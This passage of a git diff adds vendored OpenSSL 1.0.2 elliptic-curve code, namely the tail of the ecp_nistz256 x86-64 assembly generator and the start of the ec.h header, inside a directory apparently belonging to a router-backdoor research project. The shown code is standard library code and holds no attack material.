+	sbb	$poly1, $acc1
+	sbb	\$0, $acc2
+	 mov	$acc3, $t3
+	sbb	$poly3, $acc3
+	test	$t4, $t4
+
+	cmovz	$t0, $acc0
+	mov	8*0($a_ptr), $t0
+	cmovz	$t1, $acc1
+	mov	8*1($a_ptr), $t1
+	cmovz	$t2, $acc2
+	mov	8*2($a_ptr), $t2
+	cmovz	$t3, $acc3
+	mov	8*3($a_ptr), $t3
+
+	call	__ecp_nistz256_sub$x		# p256_sub(res_x, Rsqr, Hsqr);
+
+	lea	$Hcub(%rsp), $b_ptr
+	lea	$res_x(%rsp), $r_ptr
+	call	__ecp_nistz256_sub_from$x	# p256_sub(res_x, res_x, Hcub);
+
+	mov	$U2+8*0(%rsp), $t0
+	mov	$U2+8*1(%rsp), $t1
+	mov	$U2+8*2(%rsp), $t2
+	mov	$U2+8*3(%rsp), $t3
+	lea	$H(%rsp), $r_ptr
+
+	call	__ecp_nistz256_sub$x		# p256_sub(H, U2, res_x);
+
+	mov	$acc0, 8*0($r_ptr)		# save the result, as
+	mov	$acc1, 8*1($r_ptr)		# __ecp_nistz256_sub doesn't
+	mov	$acc2, 8*2($r_ptr)
+	mov	$acc3, 8*3($r_ptr)
+___
+}
+$code.=<<___;
+	`&load_for_mul("$Hcub(%rsp)", "$in1_y(%rsp)", "$src0")`
+	lea	$S2(%rsp), $r_ptr
+	call	__ecp_nistz256_mul_mont$x	# p256_mul_mont(S2, Hcub, in1_y);
+
+	`&load_for_mul("$H(%rsp)", "$R(%rsp)", "$src0")`
+	lea	$H(%rsp), $r_ptr
+	call	__ecp_nistz256_mul_mont$x	# p256_mul_mont(H, H, R);
+
+	lea	$S2(%rsp), $b_ptr
+	lea	$res_y(%rsp), $r_ptr
+	call	__ecp_nistz256_sub_from$x	# p256_sub(res_y, H, S2);
+
+	movq	%xmm0, $r_ptr		# restore $r_ptr
+
+	movdqa	%xmm5, %xmm0		# copy_conditional(res_z, ONE, in1infty);
+	movdqa	%xmm5, %xmm1
+	pandn	$res_z(%rsp), %xmm0
+	movdqa	%xmm5, %xmm2
+	pandn	$res_z+0x10(%rsp), %xmm1
+	movdqa	%xmm5, %xmm3
+	pand	.LONE_mont(%rip), %xmm2
+	pand	.LONE_mont+0x10(%rip), %xmm3
+	por	%xmm0, %xmm2
+	por	%xmm1, %xmm3
+
+	movdqa	%xmm4, %xmm0		# copy_conditional(res_z, in1_z, in2infty);
+	movdqa	%xmm4, %xmm1
+	pandn	%xmm2, %xmm0
+	movdqa	%xmm4, %xmm2
+	pandn	%xmm3, %xmm1
+	movdqa	%xmm4, %xmm3
+	pand	$in1_z(%rsp), %xmm2
+	pand	$in1_z+0x10(%rsp), %xmm3
+	por	%xmm0, %xmm2
+	por	%xmm1, %xmm3
+	movdqu	%xmm2, 0x40($r_ptr)
+	movdqu	%xmm3, 0x50($r_ptr)
+
+	movdqa	%xmm5, %xmm0		# copy_conditional(res_x, in2_x, in1infty);
+	movdqa	%xmm5, %xmm1
+	pandn	$res_x(%rsp), %xmm0
+	movdqa	%xmm5, %xmm2
+	pandn	$res_x+0x10(%rsp), %xmm1
+	movdqa	%xmm5, %xmm3
+	pand	$in2_x(%rsp), %xmm2
+	pand	$in2_x+0x10(%rsp), %xmm3
+	por	%xmm0, %xmm2
+	por	%xmm1, %xmm3
+
+	movdqa	%xmm4, %xmm0		# copy_conditional(res_x, in1_x, in2infty);
+	movdqa	%xmm4, %xmm1
+	pandn	%xmm2, %xmm0
+	movdqa	%xmm4, %xmm2
+	pandn	%xmm3, %xmm1
+	movdqa	%xmm4, %xmm3
+	pand	$in1_x(%rsp), %xmm2
+	pand	$in1_x+0x10(%rsp), %xmm3
+	por	%xmm0, %xmm2
+	por	%xmm1, %xmm3
+	movdqu	%xmm2, 0x00($r_ptr)
+	movdqu	%xmm3, 0x10($r_ptr)
+
+	movdqa	%xmm5, %xmm0		# copy_conditional(res_y, in2_y, in1infty);
+	movdqa	%xmm5, %xmm1
+	pandn	$res_y(%rsp), %xmm0
+	movdqa	%xmm5, %xmm2
+	pandn	$res_y+0x10(%rsp), %xmm1
+	movdqa	%xmm5, %xmm3
+	pand	$in2_y(%rsp), %xmm2
+	pand	$in2_y+0x10(%rsp), %xmm3
+	por	%xmm0, %xmm2
+	por	%xmm1, %xmm3
+
+	movdqa	%xmm4, %xmm0		# copy_conditional(res_y, in1_y, in2infty);
+	movdqa	%xmm4, %xmm1
+	pandn	%xmm2, %xmm0
+	movdqa	%xmm4, %xmm2
+	pandn	%xmm3, %xmm1
+	movdqa	%xmm4, %xmm3
+	pand	$in1_y(%rsp), %xmm2
+	pand	$in1_y+0x10(%rsp), %xmm3
+	por	%xmm0, %xmm2
+	por	%xmm1, %xmm3
+	movdqu	%xmm2, 0x20($r_ptr)
+	movdqu	%xmm3, 0x30($r_ptr)
+
+	add	\$32*15+8, %rsp
+	pop	%r15
+	pop	%r14
+	pop	%r13
+	pop	%r12
+	pop	%rbx
+	pop	%rbp
+	ret
+.size	ecp_nistz256_point_add_affine$sfx,.-ecp_nistz256_point_add_affine$sfx
+___
+}
+&gen_add_affine("q");
+
+########################################################################
+# AD*X magic
+#
+if ($addx) {								{
+########################################################################
+# operate in 4-5-0-1 "name space" that matches multiplication output
+#
+my ($a0,$a1,$a2,$a3,$t3,$t4)=($acc4,$acc5,$acc0,$acc1,$acc2,$acc3);
+
+$code.=<<___;
+.type	__ecp_nistz256_add_tox,\@abi-omnipotent
+.align	32
+__ecp_nistz256_add_tox:
+	xor	$t4, $t4
+	adc	8*0($b_ptr), $a0
+	adc	8*1($b_ptr), $a1
+	 mov	$a0, $t0
+	adc	8*2($b_ptr), $a2
+	adc	8*3($b_ptr), $a3
+	 mov	$a1, $t1
+	adc	\$0, $t4
+
+	xor	$t3, $t3
+	sbb	\$-1, $a0
+	 mov	$a2, $t2
+	sbb	$poly1, $a1
+	sbb	\$0, $a2
+	 mov	$a3, $t3
+	sbb	$poly3, $a3
+
+	bt	\$0, $t4
+	cmovnc	$t0, $a0
+	cmovnc	$t1, $a1
+	mov	$a0, 8*0($r_ptr)
+	cmovnc	$t2, $a2
+	mov	$a1, 8*1($r_ptr)
+	cmovnc	$t3, $a3
+	mov	$a2, 8*2($r_ptr)
+	mov	$a3, 8*3($r_ptr)
+
+	ret
+.size	__ecp_nistz256_add_tox,.-__ecp_nistz256_add_tox
+
+.type	__ecp_nistz256_sub_fromx,\@abi-omnipotent
+.align	32
+__ecp_nistz256_sub_fromx:
+	xor	$t4, $t4
+	sbb	8*0($b_ptr), $a0
+	sbb	8*1($b_ptr), $a1
+	 mov	$a0, $t0
+	sbb	8*2($b_ptr), $a2
+	sbb	8*3($b_ptr), $a3
+	 mov	$a1, $t1
+	sbb	\$0, $t4
+
+	xor	$t3, $t3
+	adc	\$-1, $a0
+	 mov	$a2, $t2
+	adc	$poly1, $a1
+	adc	\$0, $a2
+	 mov	$a3, $t3
+	adc	$poly3, $a3
+
+	bt	\$0, $t4
+	cmovnc	$t0, $a0
+	cmovnc	$t1, $a1
+	mov	$a0, 8*0($r_ptr)
+	cmovnc	$t2, $a2
+	mov	$a1, 8*1($r_ptr)
+	cmovnc	$t3, $a3
+	mov	$a2, 8*2($r_ptr)
+	mov	$a3, 8*3($r_ptr)
+
+	ret
+.size	__ecp_nistz256_sub_fromx,.-__ecp_nistz256_sub_fromx
+
+.type	__ecp_nistz256_subx,\@abi-omnipotent
+.align	32
+__ecp_nistz256_subx:
+	xor	$t4, $t4
+	sbb	$a0, $t0
+	sbb	$a1, $t1
+	 mov	$t0, $a0
+	sbb	$a2, $t2
+	sbb	$a3, $t3
+	 mov	$t1, $a1
+	sbb	\$0, $t4
+
+	xor	$a3 ,$a3
+	adc	\$-1, $t0
+	 mov	$t2, $a2
+	adc	$poly1, $t1
+	adc	\$0, $t2
+	 mov	$t3, $a3
+	adc	$poly3, $t3
+
+	bt	\$0, $t4
+	cmovc	$t0, $a0
+	cmovc	$t1, $a1
+	cmovc	$t2, $a2
+	cmovc	$t3, $a3
+
+	ret
+.size	__ecp_nistz256_subx,.-__ecp_nistz256_subx
+
+.type	__ecp_nistz256_mul_by_2x,\@abi-omnipotent
+.align	32
+__ecp_nistz256_mul_by_2x:
+	xor	$t4, $t4
+	adc	$a0, $a0		# a0:a3+a0:a3
+	adc	$a1, $a1
+	 mov	$a0, $t0
+	adc	$a2, $a2
+	adc	$a3, $a3
+	 mov	$a1, $t1
+	adc	\$0, $t4
+
+	xor	$t3, $t3
+	sbb	\$-1, $a0
+	 mov	$a2, $t2
+	sbb	$poly1, $a1
+	sbb	\$0, $a2
+	 mov	$a3, $t3
+	sbb	$poly3, $a3
+
+	bt	\$0, $t4
+	cmovnc	$t0, $a0
+	cmovnc	$t1, $a1
+	mov	$a0, 8*0($r_ptr)
+	cmovnc	$t2, $a2
+	mov	$a1, 8*1($r_ptr)
+	cmovnc	$t3, $a3
+	mov	$a2, 8*2($r_ptr)
+	mov	$a3, 8*3($r_ptr)
+
+	ret
+.size	__ecp_nistz256_mul_by_2x,.-__ecp_nistz256_mul_by_2x
+___
+									}
+&gen_double("x");
+&gen_add("x");
+&gen_add_affine("x");
+}
+}}}
+
+$code =~ s/\`([^\`]*)\`/eval $1/gem;
+print $code;
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec.h
new file mode 100644
index 0000000..98edfdf
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec.h
@@ -0,0 +1,1281 @@
+/* crypto/ec/ec.h */
+/*
+ * Originally written by Bodo Moeller for the OpenSSL project.
+ */
+/**
+ * \file crypto/ec/ec.h Include file for the OpenSSL EC functions
+ * \author Originally written by Bodo Moeller for the OpenSSL project
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2005 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+/* ====================================================================
+ * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
+ *
+ * Portions of the attached software ("Contribution") are developed by
+ * SUN MICROSYSTEMS, INC., and are contributed to the OpenSSL project.
+ *
+ * The Contribution is licensed pursuant to the OpenSSL open source
+ * license provided above.
+ *
+ * The elliptic curve binary polynomial software is originally written by
+ * Sheueling Chang Shantz and Douglas Stebila of Sun Microsystems Laboratories.
+ *
+ */
+
+#ifndef HEADER_EC_H
+# define HEADER_EC_H
+
+# include <openssl/opensslconf.h>
+
+# ifdef OPENSSL_NO_EC
+#  error EC is disabled.
+# endif
+
+# include <openssl/asn1.h>
+# include <openssl/symhacks.h>
+# ifndef OPENSSL_NO_DEPRECATED
+#  include <openssl/bn.h>
+# endif
+
+# ifdef  __cplusplus
+extern "C" {
+# elif defined(__SUNPRO_C)
+#  if __SUNPRO_C >= 0x520
+#   pragma error_messages (off,E_ARRAY_OF_INCOMPLETE_NONAME,E_ARRAY_OF_INCOMPLETE)
+#  endif
+# endif
+
+# ifndef OPENSSL_ECC_MAX_FIELD_BITS
+#  define OPENSSL_ECC_MAX_FIELD_BITS 661
+# endif
+
+/** Enum for the point conversion form as defined in X9.62 (ECDSA)
+ *  for the encoding of a elliptic curve point (x,y) */
+typedef enum {
+        /** the point is encoded as z||x, where the octet z specifies
+         *  which solution of the quadratic equation y is  */
+    POINT_CONVERSION_COMPRESSED = 2,
+        /** the point is encoded as z||x||y, where z is the octet 0x02  */
+    POINT_CONVERSION_UNCOMPRESSED = 4,
+        /** the point is encoded as z||x||y, where the octet z specifies
+         *  which solution of the quadratic equation y is  */
+    POINT_CONVERSION_HYBRID = 6
+} point_conversion_form_t;
+
+typedef struct ec_method_st EC_METHOD;
+
+typedef struct ec_group_st
+    /*-
+     EC_METHOD *meth;
+     -- field definition
+     -- curve coefficients
+     -- optional generator with associated information (order, cofactor)
+     -- optional extra data (precomputed table for fast computation of multiples of generator)
+     -- ASN1 stuff
+    */
+    EC_GROUP;
+
+typedef struct ec_point_st EC_POINT;
+
+/********************************************************************/
+/*               EC_METHODs for curves over GF(p)                   */
+/********************************************************************/
+
+/** Returns the basic GFp ec methods which provides the basis for the
+ *  optimized methods.
+ *  \return  EC_METHOD object
+ */
+const EC_METHOD *EC_GFp_simple_method(void);
+
+/** Returns GFp methods using montgomery multiplication.
+ *  \return  EC_METHOD object
+ */
+const EC_METHOD *EC_GFp_mont_method(void);
+
+/** Returns GFp methods using optimized methods for NIST recommended curves
+ *  \return  EC_METHOD object
+ */
+const EC_METHOD *EC_GFp_nist_method(void);
+
+# ifndef OPENSSL_NO_EC_NISTP_64_GCC_128
+/** Returns 64-bit optimized methods for nistp224
+ *  \return  EC_METHOD object
+ */
+const EC_METHOD *EC_GFp_nistp224_method(void);
+
+/** Returns 64-bit optimized methods for nistp256
+ *  \return  EC_METHOD object
+ */
+const EC_METHOD *EC_GFp_nistp256_method(void);
+
+/** Returns 64-bit optimized methods for nistp521
+ *  \return  EC_METHOD object
+ */
+const EC_METHOD *EC_GFp_nistp521_method(void);
+# endif
+
+# ifndef OPENSSL_NO_EC2M
+/********************************************************************/
+/*           EC_METHOD for curves over GF(2^m)                      */
+/********************************************************************/
+
+/** Returns the basic GF2m ec method
+ *  \return  EC_METHOD object
+ */
+const EC_METHOD *EC_GF2m_simple_method(void);
+
+# endif
+
+/********************************************************************/
+/*                   EC_GROUP functions                             */
+/********************************************************************/
+
+/** Creates a new EC_GROUP object
+ *  \param   meth  EC_METHOD to use
+ *  \return  newly created EC_GROUP object or NULL in case of an error.
+ */
+EC_GROUP *EC_GROUP_new(const EC_METHOD *meth);
+
+/** Frees a EC_GROUP object
+ *  \param  group  EC_GROUP object to be freed.
+ */
+void EC_GROUP_free(EC_GROUP *group);
+
+/** Clears and frees a EC_GROUP object
+ *  \param  group  EC_GROUP object to be cleared and freed.
+ */
+void EC_GROUP_clear_free(EC_GROUP *group);
+
+/** Copies EC_GROUP objects. Note: both EC_GROUPs must use the same EC_METHOD.
+ *  \param  dst  destination EC_GROUP object
+ *  \param  src  source EC_GROUP object
+ *  \return 1 on success and 0 if an error occurred.
+ */
+int EC_GROUP_copy(EC_GROUP *dst, const EC_GROUP *src);
+
+/** Creates a new EC_GROUP object and copies the copies the content
+ *  form src to the newly created EC_KEY object
+ *  \param  src  source EC_GROUP object
+ *  \return newly created EC_GROUP object or NULL in case of an error.
+ */
+EC_GROUP *EC_GROUP_dup(const EC_GROUP *src);
+
+/** Returns the EC_METHOD of the EC_GROUP object.
+ *  \param  group  EC_GROUP object
+ *  \return EC_METHOD used in this EC_GROUP object.
+ */
+const EC_METHOD *EC_GROUP_method_of(const EC_GROUP *group);
+
+/** Returns the field type of the EC_METHOD.
+ *  \param  meth  EC_METHOD object
+ *  \return NID of the underlying field type OID.
+ */
+int EC_METHOD_get_field_type(const EC_METHOD *meth);
+
+/** Sets the generator and it's order/cofactor of a EC_GROUP object.
+ *  \param  group      EC_GROUP object
+ *  \param  generator  EC_POINT object with the generator.
+ *  \param  order      the order of the group generated by the generator.
+ *  \param  cofactor   the index of the sub-group generated by the generator
+ *                     in the group of all points on the elliptic curve.
+ *  \return 1 on success and 0 if an error occured
+ */
+int EC_GROUP_set_generator(EC_GROUP *group, const EC_POINT *generator,
+                           const BIGNUM *order, const BIGNUM *cofactor);
+
+/** Returns the generator of a EC_GROUP object.
+ *  \param  group  EC_GROUP object
+ *  \return the currently used generator (possibly NULL).
+ */
+const EC_POINT *EC_GROUP_get0_generator(const EC_GROUP *group);
+
+/** Returns the montgomery data for order(Generator)
+ *  \param  group  EC_GROUP object
+ *  \return the currently used generator (possibly NULL).
+*/
+BN_MONT_CTX *EC_GROUP_get_mont_data(const EC_GROUP *group);
+
+/** Gets the order of a EC_GROUP
+ *  \param  group  EC_GROUP object
+ *  \param  order  BIGNUM to which the order is copied
+ *  \param  ctx    BN_CTX object (optional)
+ *  \return 1 on success and 0 if an error occured
+ */
+int EC_GROUP_get_order(const EC_GROUP *group, BIGNUM *order, BN_CTX *ctx);
+
+/** Gets the cofactor of a EC_GROUP
+ *  \param  group     EC_GROUP object
+ *  \param  cofactor  BIGNUM to which the cofactor is copied
+ *  \param  ctx       BN_CTX object (optional)
+ *  \return 1 on success and 0 if an error occured
+ */
+int EC_GROUP_get_cofactor(const EC_GROUP *group, BIGNUM *cofactor,
+                          BN_CTX *ctx);
+
+/** Sets the name of a EC_GROUP object
+ *  \param  group  EC_GROUP object
+ *  \param  nid    NID of the curve name OID
+ */
+void EC_GROUP_set_curve_name(EC_GROUP *group, int nid);
+
+/** Returns the curve name of a EC_GROUP object
+ *  \param  group  EC_GROUP object
+ *  \return NID of the curve name OID or 0 if not set.
+ */
+int EC_GROUP_get_curve_name(const EC_GROUP *group);
+
+void EC_GROUP_set_asn1_flag(EC_GROUP *group, int flag);
+int EC_GROUP_get_asn1_flag(const EC_GROUP *group);
+
+void EC_GROUP_set_point_conversion_form(EC_GROUP *group,
+                                        point_conversion_form_t form);
+point_conversion_form_t EC_GROUP_get_point_conversion_form(const EC_GROUP *);
+
+unsigned char *EC_GROUP_get0_seed(const EC_GROUP *x);
+size_t EC_GROUP_get_seed_len(const EC_GROUP *);
+size_t EC_GROUP_set_seed(EC_GROUP *, const unsigned char *, size_t len);
+
+/** Sets the parameter of a ec over GFp defined by y^2 = x^3 + a*x + b
+ *  \param  group  EC_GROUP object
+ *  \param  p      BIGNUM with the prime number
+ *  \param  a      BIGNUM with parameter a of the equation
+ *  \param  b      BIGNUM with parameter b of the equation
+ *  \param  ctx    BN_CTX object (optional)
+ *  \return 1 on success and 0 if an error occured
+ */
+int EC_GROUP_set_curve_GFp(EC_GROUP *group, const BIGNUM *p, const BIGNUM *a,
+                           const BIGNUM *b, BN_CTX *ctx);
+
+/** Gets the parameter of the ec over GFp defined by y^2 = x^3 + a*x + b
+ *  \param  group  EC_GROUP object
+ *  \param  p      BIGNUM for the prime number
+ *  \param  a      BIGNUM for parameter a of the equation
+ *  \param  b      BIGNUM for parameter b of the equation
+ *  \param  ctx    BN_CTX object (optional)
+ *  \return 1 on success and 0 if an error occured
+ */
+int EC_GROUP_get_curve_GFp(const EC_GROUP *group, BIGNUM *p, BIGNUM *a,
+                           BIGNUM *b, BN_CTX *ctx);
+
+# ifndef OPENSSL_NO_EC2M
+/** Sets the parameter of a ec over GF2m defined by y^2 + x*y = x^3 + a*x^2 + b
+ *  \param  group  EC_GROUP object
+ *  \param  p      BIGNUM with the polynomial defining the underlying field
+ *  \param  a      BIGNUM with parameter a of the equation
+ *  \param  b      BIGNUM with parameter b of the equation
+ *  \param  ctx    BN_CTX object (optional)
+ *  \return 1 on success and 0 if an error occured
+ */
+int EC_GROUP_set_curve_GF2m(EC_GROUP *group, const BIGNUM *p, const BIGNUM *a,
+                            const BIGNUM *b, BN_CTX *ctx);
+
+/** Gets the parameter of the ec over GF2m defined by y^2 + x*y = x^3 + a*x^2 + b
+ *  \param  group  EC_GROUP object
+ *  \param  p      BIGNUM for the polynomial defining the underlying field
+ *  \param  a      BIGNUM for parameter a of the equation
+ *  \param  b      BIGNUM for parameter b of the equation
+ *  \param  ctx    BN_CTX object (optional)
+ *  \return 1 on success and 0 if an error occured
+ */
+int EC_GROUP_get_curve_GF2m(const EC_GROUP *group, BIGNUM *p, BIGNUM *a,
+                            BIGNUM *b, BN_CTX *ctx);
+# endif
+/** Returns the number of bits needed to represent a field element
+ *  \param  group  EC_GROUP object
+ *  \return number of bits needed to represent a field element
+ */
+int EC_GROUP_get_degree(const EC_GROUP *group);
+
+/** Checks whether the parameter in the EC_GROUP define a valid ec group
+ *  \param  group  EC_GROUP object
+ *  \param  ctx    BN_CTX object (optional)
+ *  \return 1 if group is a valid ec group and 0 otherwise
+ */
+int EC_GROUP_check(const EC_GROUP *group, BN_CTX *ctx);
+
+/** Checks whether the discriminant of the elliptic curve is zero or not
+ *  \param  group  EC_GROUP object
+ *  \param  ctx    BN_CTX object (optional)
+ *  \return 1 if the discriminant is not zero and 0 otherwise
+ */
+int EC_GROUP_check_discriminant(const EC_GROUP *group, BN_CTX *ctx);
+
+/** Compares two EC_GROUP objects
+ *  \param  a    first EC_GROUP object
+ *  \param  b    second EC_GROUP object
+ *  \param  ctx  BN_CTX object (optional)
+ *  \return 0 if both groups are equal and 1 otherwise
+ */
+int EC_GROUP_cmp(const EC_GROUP *a, const EC_GROUP *b, BN_CTX *ctx);
+
+/*
+ * EC_GROUP_new_GF*() calls EC_GROUP_new() and EC_GROUP_set_GF*() after
+ * choosing an appropriate EC_METHOD
+ */
+
+/** Creates a new EC_GROUP object with the specified parameters defined
+ *  over GFp (defined by the equation y^2 = x^3 + a*x + b)
+ *  \param  p    BIGNUM with the prime number
+ *  \param  a    BIGNUM with the parameter a of the equation
+ *  \param  b    BIGNUM with the parameter b of the equation
+ *  \param  ctx  BN_CTX object (optional)
+ *  \return newly created EC_GROUP object with the specified parameters
+ */
+EC_GROUP *EC_GROUP_new_curve_GFp(const BIGNUM *p, const BIGNUM *a,
+                                 const BIGNUM *b, BN_CTX *ctx);
+# ifndef OPENSSL_NO_EC2M
+/** Creates a new EC_GROUP object with the specified parameters defined
+ *  over GF2m (defined by the equation y^2 + x*y = x^3 + a*x^2 + b)
+ *  \param  p    BIGNUM with the polynomial defining the underlying field
+ *  \param  a    BIGNUM with the parameter a of the equation
+ *  \param  b    BIGNUM with the parameter b of the equation
+ *  \param  ctx  BN_CTX object (optional)
+ *  \return newly created EC_GROUP object with the specified parameters
+ */
+EC_GROUP *EC_GROUP_new_curve_GF2m(const BIGNUM *p, const BIGNUM *a,
+                                  const BIGNUM *b, BN_CTX *ctx);
+# endif
+/** Creates a EC_GROUP object with a curve specified by a NID
+ *  \param  nid  NID of the OID of the curve name
+ *  \return newly created EC_GROUP object with specified curve or NULL
+ *          if an error occurred
+ */
+EC_GROUP *EC_GROUP_new_by_curve_name(int nid);
+
+/********************************************************************/
+/*               handling of internal curves                        */
+/********************************************************************/
+
+typedef struct {
+    int nid;
+    const char *comment;
+} EC_builtin_curve;
+
+/*
+ * EC_builtin_curves(EC_builtin_curve *r, size_t size) returns number of all
+ * available curves or zero if a error occurred. In case r ist not zero
+ * nitems EC_builtin_curve structures are filled with the data of the first
+ * nitems internal groups
+ */
+size_t EC_get_builtin_curves(EC_builtin_curve *r, size_t nitems);
+
+const char *EC_curve_nid2nist(int nid);
+int EC_curve_nist2nid(const char *name);
+
+/********************************************************************/
+/*                    EC_POINT functions                            */
+/********************************************************************/
+
+/** Creates a new EC_POINT object for the specified EC_GROUP
+ *  \param  group  EC_GROUP the underlying EC_GROUP object
+ *  \return newly created EC_POINT object or NULL if an error occurred
+ */
+EC_POINT *EC_POINT_new(const EC_GROUP *group);
+
+/** Frees a EC_POINT object
+ *  \param  point  EC_POINT object to be freed
+ */
+void EC_POINT_free(EC_POINT *point);
+
+/** Clears and frees a EC_POINT object
+ *  \param  point  EC_POINT object to be cleared and freed
+ */
+void EC_POINT_clear_free(EC_POINT *point);
+
+/** Copies EC_POINT object
+ *  \param  dst  destination EC_POINT object
+ *  \param  src  source EC_POINT object
+ *  \return 1 on success and 0 if an error occured
+ */
+int EC_POINT_copy(EC_POINT *dst, const EC_POINT *src);
+
+/** Creates a new EC_POINT object and copies the content of the supplied
+ *  EC_POINT
+ *  \param  src    source EC_POINT object
+ *  \param  group  underlying the EC_GROUP object
+ *  \return newly created EC_POINT object or NULL if an error occurred
+ */
+EC_POINT *EC_POINT_dup(const EC_POINT *src, const EC_GROUP *group);
+
+/** Returns the EC_METHOD used in EC_POINT object
+ *  \param  point  EC_POINT object
+ *  \return the EC_METHOD used
+ */
+const EC_METHOD *EC_POINT_method_of(const EC_POINT *point);
+
+/** Sets a point to infinity (neutral element)
+ *  \param  group  underlying EC_GROUP object
+ *  \param  point  EC_POINT to set to infinity
+ *  \return 1 on success and 0 if an error occured
+ */
+int EC_POINT_set_to_infinity(const EC_GROUP *group, EC_POINT *point);
+
+/** Sets the jacobian projective coordinates of a EC_POINT over GFp
+ *  \param  group  underlying EC_GROUP object
+ *  \param  p      EC_POINT object
+ *  \param  x      BIGNUM with the x-coordinate
+ *  \param  y      BIGNUM with the y-coordinate
+ *  \param  z      BIGNUM with the z-coordinate
+ *  \param  ctx    BN_CTX object (optional)
+ *  \return 1 on success and 0 if an error occured
+ */
+int EC_POINT_set_Jprojective_coordinates_GFp(const EC_GROUP *group,
+                                             EC_POINT *p, const BIGNUM *x,
+                                             const BIGNUM *y, const BIGNUM *z,
+                                             BN_CTX *ctx);
+
+/** Gets the jacobian projective coordinates of a EC_POINT over GFp
+ *  \param  group  underlying EC_GROUP object
+ *  \param  p      EC_POINT object
+ *  \param  x      BIGNUM for the x-coordinate
+ *  \param  y      BIGNUM for the y-coordinate
+ *  \param  z      BIGNUM for the z-coordinate
+ *  \param  ctx    BN_CTX object (optional)
+ *  \return 1 on success and 0 if an error occured
+ */
+int EC_POINT_get_Jprojective_coordinates_GFp(const EC_GROUP *group,
+                                             const EC_POINT *p, BIGNUM *x,
+                                             BIGNUM *y, BIGNUM *z,
+                                             BN_CTX *ctx);
+
+/** Sets the affine coordinates of a EC_POINT over GFp
+ *  \param  group  underlying EC_GROUP object
+ *  \param  p      EC_POINT object
+ *  \param  x      BIGNUM with the x-coordinate
+ *  \param  y      BIGNUM with the y-coordinate
+ *  \param  ctx    BN_CTX object (optional)
+ *  \return 1 on success and 0 if an error occured
+ */
+int EC_POINT_set_affine_coordinates_GFp(const EC_GROUP *group, EC_POINT *p,
+                                        const BIGNUM *x, const BIGNUM *y,
+                                        BN_CTX *ctx);
+
+/** Gets the affine coordinates of a EC_POINT over GFp
+ *  \param  group  underlying EC_GROUP object
+ *  \param  p      EC_POINT object
+ *  \param  x      BIGNUM for the x-coordinate
+ *  \param  y      BIGNUM for the y-coordinate
+ *  \param  ctx    BN_CTX object (optional)
+ *  \return 1 on success and 0 if an error occured
+ */
+int EC_POINT_get_affine_coordinates_GFp(const EC_GROUP *group,
+                                        const EC_POINT *p, BIGNUM *x,
+                                        BIGNUM *y, BN_CTX *ctx);
+
+/** Sets the x9.62 compressed coordinates of a EC_POINT over GFp
+ *  \param  group  underlying EC_GROUP object
+ *  \param  p      EC_POINT object
+ *  \param  x      BIGNUM with x-coordinate
+ *  \param  y_bit  integer with the y-Bit (either 0 or 1)
+ *  \param  ctx    BN_CTX object (optional)
+ *  \return 1 on success and 0 if an error occured
+ */
+int EC_POINT_set_compressed_coordinates_GFp(const EC_GROUP *group,
+                                            EC_POINT *p, const BIGNUM *x,
+                                            int y_bit, BN_CTX *ctx);
+# ifndef OPENSSL_NO_EC2M
+/** Sets the affine coordinates of a EC_POINT over GF2m
+ *  \param  group  underlying EC_GROUP object
+ *  \param  p      EC_POINT object
+ *  \param  x      BIGNUM with the x-coordinate
+ *  \param  y      BIGNUM with the y-coordinate
+ *  \param  ctx    BN_CTX object (optional)
+ *  \return 1 on success and 0 if an error occured
+ */
+int EC_POINT_set_affine_coordinates_GF2m(const EC_GROUP *group, EC_POINT *p,
+                                         const BIGNUM *x, const BIGNUM *y,
+                                         BN_CTX *ctx);
+
+/** Gets the affine coordinates of a EC_POINT over GF2m
+ *  \param  group  underlying EC_GROUP object
+ *  \param  p      EC_POINT object
